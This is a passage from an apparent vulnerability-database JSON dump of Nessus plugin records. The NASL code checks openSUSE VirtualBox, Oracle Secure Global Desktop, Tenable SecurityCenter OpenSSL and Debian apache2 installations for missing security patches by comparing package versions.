"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-vnc", "p-cpe:/a:novell:opensuse:virtualbox-guest-source", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:kbuild-debuginfo", "p-cpe:/a:novell:opensuse:kbuild-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons", "p-cpe:/a:novell:opensuse:kbuild"], "id": "OPENSUSE-2018-938.NASL", "href": "https://www.tenable.com/plugins/nessus/112143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-938.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112143);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-5715\", \"CVE-2018-0739\", \"CVE-2018-2676\", \"CVE-2018-2685\", \"CVE-2018-2686\", \"CVE-2018-2687\", \"CVE-2018-2688\", \"CVE-2018-2689\", \"CVE-2018-2690\", \"CVE-2018-2693\", \"CVE-2018-2694\", \"CVE-2018-2698\", \"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\", \"CVE-2018-3005\", \"CVE-2018-3055\", \"CVE-2018-3085\", \"CVE-2018-3086\", \"CVE-2018-3087\", \"CVE-2018-3088\", \"CVE-2018-3089\", \"CVE-2018-3090\", \"CVE-2018-3091\");\n\n script_name(english:\"openSUSE Security Update : kbuild / virtualbox (openSUSE-2018-938) 
(Spectre)\");\n script_summary(english:\"Check for the openSUSE-2018-938 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for kbuild, virtualbox fixes the following issues :\n\nkbuild changes :\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n\nvirtualbox security fixes (boo#1101667, boo#1076372) :\n\n - CVE-2018-3005\n\n - CVE-2018-3055\n\n - CVE-2018-3085\n\n - CVE-2018-3086\n\n - CVE-2018-3087\n\n - CVE-2018-3088\n\n - CVE-2018-3089\n\n - CVE-2018-3090\n\n - CVE-2018-3091\n\n - CVE-2018-2694\n\n - CVE-2018-2698\n\n - CVE-2018-2685\n\n - CVE-2018-2686\n\n - CVE-2018-2687\n\n - CVE-2018-2688\n\n - CVE-2018-2689\n\n - CVE-2018-2690\n\n - CVE-2018-2676\n\n - CVE-2018-2693\n\n - CVE-2017-5715\n\nvirtualbox other changes :\n\n - Version bump to 5.2.16\n\n - Use %(?linux_make_arch) when building kernel modules\n (boo#1098050)\n\n - Fixed vboxguestconfig.sh script\n\n - Update warning regarding the security hole in USB\n passthrough. 
(boo#1097248)\n\n - Fixed include for build with Qt 5.11 (boo#1093731)\n\n - You can find a detailed list of changes\n [here](https://www.virtualbox.org/wiki/Changelog#v16)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093731\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097248\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.virtualbox.org/wiki/Changelog#v16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kbuild / virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kbuild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kbuild-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kbuild-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-vnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-debuginfo-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-debugsource-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-desktop-icons-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-source-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-host-source-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"python-virtualbox-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"python-virtualbox-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-debuginfo-5.2.18-56.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-debugsource-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-devel-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-kmp-default-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-tools-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-tools-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-x11-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-x11-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-host-kmp-default-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-host-kmp-default-debuginfo-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-qt-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-qt-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-vnc-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-websrv-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-websrv-debuginfo-5.2.18-56.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kbuild / kbuild-debuginfo / kbuild-debugsource / python-virtualbox / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-01-01T04:35:04", "description": "The version of Oracle Secure Global Desktop installed on the remote\nhost is 5.3 and is missing a security patch from the April 2018\nCritical Patch Update (CPU). It is, therefore, affected by multiple\nvulnerabilities.", "edition": 24, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-04-19T00:00:00", "title": "Oracle Secure Global Desktop Multiple Vulnerabilities (April 2018 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-3737", "CVE-2017-3738"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:virtualization_secure_global_desktop"], "id": "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/109165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109165);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/26 18:36:16\");\n\n script_cve_id(\"CVE-2017-3737\", \"CVE-2017-3738\", \"CVE-2017-9798\");\n script_bugtraq_id(100872, 102103, 102118);\n\n script_name(english:\"Oracle Secure Global Desktop Multiple Vulnerabilities (April 2018 CPU)\");\n script_summary(english:\"Checks the version of Oracle Secure Global Desktop.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Secure Global Desktop installed on the remote\nhost is 5.3 and is missing a security patch from the April 2018\nCritical Patch Update (CPU). 
It is, therefore, affected by multiple\nvulnerabilities.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05e0bcf5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:virtualization_secure_global_desktop\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_secure_global_desktop_installed.nbin\");\n script_require_keys(\"Host/Oracle_Secure_Global_Desktop/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp = \"Oracle Secure Global Desktop\";\nversion = get_kb_item_or_exit(\"Host/Oracle_Secure_Global_Desktop/Version\");\n\n# this check is for Oracle Secure Global Desktop packages built for Linux platform\nuname = get_kb_item_or_exit(\"Host/uname\");\nif (\"Linux\" >!< uname) audit(AUDIT_OS_NOT, \"Linux\");\n\nfix_required = NULL;\n\nif (version =~ \"^5\\.30($|\\.)\") fix_required = 'Patch_53p4';\n\nif (isnull(fix_required)) audit(AUDIT_INST_VER_NOT_VULN, \"Oracle Secure Global Desktop\", version);\n\npatches = get_kb_list(\"Host/Oracle_Secure_Global_Desktop/Patches\");\n\npatched = FALSE;\nforeach patch (patches)\n{\n if (patch == fix_required)\n {\n patched = TRUE;\n break;\n }\n}\n\nif (patched) audit(AUDIT_INST_VER_NOT_VULN, app, version + ' (with ' + fix_required + ')');\n\nreport = '\\n Installed version : ' + version +\n '\\n Patch required : ' + fix_required +\n '\\n';\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-10T17:25:44", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. 
It is, therefore, affected by multiple\nvulnerabilities in the bundled version of OpenSSL.", "edition": 27, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2018-02-02T00:00:00", "title": "Tenable SecurityCenter OpenSSL 1.0.2 < 1.0.2n Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-3737", "CVE-2018-0739", "CVE-2018-0733", "CVE-2017-3738"], "modified": "2018-02-02T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_OPENSSL_1_0_2N.NASL", "href": "https://www.tenable.com/plugins/nessus/106563", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106563);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/09\");\n\n script_cve_id(\n \"CVE-2017-3737\",\n \"CVE-2017-3738\",\n \"CVE-2018-0733\",\n \"CVE-2018-0739\"\n );\n script_bugtraq_id(102103, 102118);\n\n script_name(english:\"Tenable SecurityCenter OpenSSL 1.0.2 < 1.0.2n Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of OpenSSL in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains an\nOpenSSL library that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. 
It is, therefore, affected by multiple\nvulnerabilities in the bundled version of OpenSSL.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2018-04\");\n # https://docs.tenable.com/releasenotes/securitycenter/securitycenter79.htm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?706680e4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20171207.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.6.1 or later.\nAlternatively, apply SecurityCenter Patch SC-201801.1.5.x.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-0733\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/openssl/version\");\n\n exit(0);\n}\n\ninclude(\"openssl_version.inc\");\ninclude(\"install_func.inc\");\n\napp = \"OpenSSL (within SecurityCenter)\";\nfix = \"1.0.2n\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/openssl/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (\n openssl_ver_cmp(ver:version, fix:\"1.0.2\", same_branch:TRUE, is_min_check:FALSE) >= 0 &&\n openssl_ver_cmp(ver:version, fix:fix, same_branch:TRUE, is_min_check:FALSE) < 0\n)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter OpenSSL version : ' + version +\n '\\n Fixed OpenSSL version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T09:38:39", "description": "Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "title": "Debian DLA-1102-1 : apache2 security update (Optionsbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:apache2-threaded-dev", "p-cpe:/a:debian:debian_linux:apache2.2-common", "p-cpe:/a:debian:debian_linux:apache2-dbg", "p-cpe:/a:debian:debian_linux:apache2-prefork-dev", "p-cpe:/a:debian:debian_linux:apache2-mpm-event", "p-cpe:/a:debian:debian_linux:apache2-doc", "p-cpe:/a:debian:debian_linux:apache2-suexec-custom", "p-cpe:/a:debian:debian_linux:apache2-suexec", "p-cpe:/a:debian:debian_linux:apache2.2-bin", "p-cpe:/a:debian:debian_linux:apache2-mpm-itk", "p-cpe:/a:debian:debian_linux:apache2-utils", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:apache2", "p-cpe:/a:debian:debian_linux:apache2-mpm-worker", "p-cpe:/a:debian:debian_linux:apache2-mpm-prefork"], "id": "DEBIAN_DLA-1102.NASL", "href": "https://www.tenable.com/plugins/nessus/103389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1102-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103389);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-9798\");\n\n script_name(english:\"Debian DLA-1102-1 : apache2 security update (Optionsbleed)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00019.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-suexec-custom\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n 